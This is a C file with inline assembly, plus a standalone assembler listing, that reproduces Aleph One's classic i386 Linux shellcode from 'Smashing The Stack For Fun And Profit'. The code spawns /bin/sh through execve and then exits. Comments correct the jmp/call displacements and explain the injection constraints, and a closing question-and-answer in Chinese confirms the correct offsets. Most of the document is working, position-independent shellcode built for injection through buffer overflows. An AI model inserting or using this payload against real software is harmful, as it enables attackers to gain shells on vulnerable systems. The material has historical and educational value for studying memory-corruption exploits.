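/*
 * Aleph One's "shellcodeasm.c" (Smashing The Stack For Fun And Profit):
 * execve("/bin/sh", argv, envp) followed by exit(0), written as
 * position-independent i386 inline assembly.
 *
 * The jmp/call pair recovers the address of the "/bin/sh" string without
 * knowing where the code was loaded: jmp forward to the call, the call
 * pushes the address of the byte after itself (the string) as its return
 * address and jumps back, and popl %esi pops that address.  The code then
 * builds argv/envp right after the string: argv[0] = &"/bin/sh" at
 * %esi+8, argv[1] = envp[0] = NULL at %esi+12 ("/bin/sh" is 7 characters
 * plus NUL, so +8 and +12 lie just past it), and writes the string's
 * terminating NUL at %esi+7 itself -- presumably so the code still works
 * when it is injected through a copy that stops at the first NUL byte.
 *
 * Displacements: the twelve instructions between popl and call occupy
 * 1+3+4+7+5+2+3+3+2+5+5+2 = 42 = 0x2a bytes.  A short jmp is 2 bytes
 * (EB 2A, not 3 as older copies of this listing claim) and skips exactly
 * those 0x2a bytes; the 5-byte call then goes back -(0x2a + 5) = -0x2f
 * (E8 D1 FF FF FF).  The pair "jmp 0x26 / call -0x2b" that circulates in
 * some copies is 4 bytes short and would jump into the middle of
 * "movl $0x0,%ebx".  Hand-counted numbers are also not what GNU as means
 * by "jmp 0x2a" (a bare number is an absolute address, not a
 * displacement), so the targets are written as local labels below and the
 * assembler emits the same bytes.
 *
 * Caveats: the sequence is 32-bit Linux only (int $0x80 with
 * %eax = 11 execve / 1 exit), so it is compiled out on other targets.
 * Run as a normal program it stores into the bytes following the string,
 * i.e. into .text, which is mapped read-only on current systems -- the
 * first store faults.  It only runs when the bytes are copied into a
 * mapping that is both writable and executable, as the paper's testsc.c
 * harness does.
 *
 * Returns 0 on the i386 path (never actually reached: execve or exit
 * takes over), 1 when the asm is unavailable for the target.
 */
int main(void) {
#if defined(__i386__)
    __asm__(
        "jmp    1f\n\t"                 /*  2 bytes: EB 2A, skip 0x2a bytes    */
        "2:\n\t"
        "popl   %esi\n\t"               /*  1 byte:  %esi = &"/bin/sh"         */
        "movl   %esi,0x8(%esi)\n\t"     /*  3 bytes: argv[0] = &"/bin/sh"      */
        "movb   $0x0,0x7(%esi)\n\t"     /*  4 bytes: NUL-terminate the string  */
        "movl   $0x0,0xc(%esi)\n\t"     /*  7 bytes: argv[1] = envp[0] = NULL  */
        "movl   $0xb,%eax\n\t"          /*  5 bytes: __NR_execve               */
        "movl   %esi,%ebx\n\t"          /*  2 bytes: path                      */
        "leal   0x8(%esi),%ecx\n\t"     /*  3 bytes: argv                      */
        "leal   0xc(%esi),%edx\n\t"     /*  3 bytes: envp (points at the NULL) */
        "int    $0x80\n\t"              /*  2 bytes: execve                    */
        "movl   $0x1,%eax\n\t"          /*  5 bytes: __NR_exit, only if execve failed */
        "movl   $0x0,%ebx\n\t"          /*  5 bytes: status 0                  */
        "int    $0x80\n\t"              /*  2 bytes: exit                      */
        "1:\n\t"
        "call   2b\n\t"                 /*  5 bytes: E8 D1 FF FF FF (-0x2f)    */
        ".string \"/bin/sh\""           /*  8 bytes, NUL included              */
    );
#else
    /* 32-bit x86 Linux only: build with -m32 on such a toolchain. */
    return 1;
#endif
    return 0;
}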
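# Aleph One's execve("/bin/sh") + exit(0) sequence for i386 Linux, with
# the jmp/call displacements corrected.
#
# Everything between popl and call is 1+3+4+7+5+2+3+3+2+5+5+2 = 42 = 0x2a
# bytes.  The short jmp is 2 bytes (EB 2A) and skips exactly 0x2a; the
# 5-byte call then goes back -(0x2a + 5) = -0x2f (E8 D1 FF FF FF).  So
# "jmp 0x2a / call -0x2f" is the pair that matches this instruction
# sequence; "jmp 0x26 / call -0x2b" is 4 bytes short and would land inside
# "movl $0x0,%ebx".  GNU as reads a bare number after jmp/call as an
# absolute address rather than a displacement, so the targets are written
# as local labels here; the emitted bytes are the ones in the comments.
#
# The stores to 0x7/0x8/0xc(%esi) land on and just after the 8-byte
# string, so the bytes must sit in memory that is writable as well as
# executable (they fault if run straight out of a read-only .text).
        jmp     1f                      # 2 bytes  EB 2A  (skip 0x2a bytes)
2:      popl    %esi                    # 1 byte   %esi = &"/bin/sh"
        movl    %esi,0x8(%esi)          # 3 bytes  argv[0] = &"/bin/sh"
        movb    $0x0,0x7(%esi)          # 4 bytes  NUL-terminate the string
        movl    $0x0,0xc(%esi)          # 7 bytes  argv[1] = envp[0] = NULL
        movl    $0xb,%eax               # 5 bytes  __NR_execve
        movl    %esi,%ebx               # 2 bytes  path
        leal    0x8(%esi),%ecx          # 3 bytes  argv
        leal    0xc(%esi),%edx          # 3 bytes  envp
        int     $0x80                   # 2 bytes  execve
        movl    $0x1,%eax               # 5 bytes  __NR_exit (only if execve failed)
        movl    $0x0,%ebx               # 5 bytes  status 0
        int     $0x80                   # 2 bytes  exit
1:      call    2b                      # 5 bytes  E8 D1 FF FF FF  (-0x2f)
        .string "/bin/sh"               # 8 bytes  NUL included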
为什么文中两处的偏移量不一样？
1. jmp 0x26 / call -0x2b
2. jmp 0x2a / call -0x2f
到底哪一个对？
（按注释里各指令的字节数相加，popl 到 call 之间共 1+3+4+7+5+2+3+3+2+5+5+2 = 42 = 0x2a 字节；短跳 jmp 本身占 2 字节、call 占 5 字节，所以 jmp 0x2a、call -(0x2a+5) = -0x2f 才与这段指令自洽，对应机器码 EB 2A 和 E8 D1 FF FF FF。0x26/-0x2b 少算了 4 字节，会跳到 movl $0x0,%ebx 的中间。另外 GNU as 把 jmp/call 后面的裸数字当作绝对地址而不是相对位移，用局部标号让汇编器自己算更稳妥。）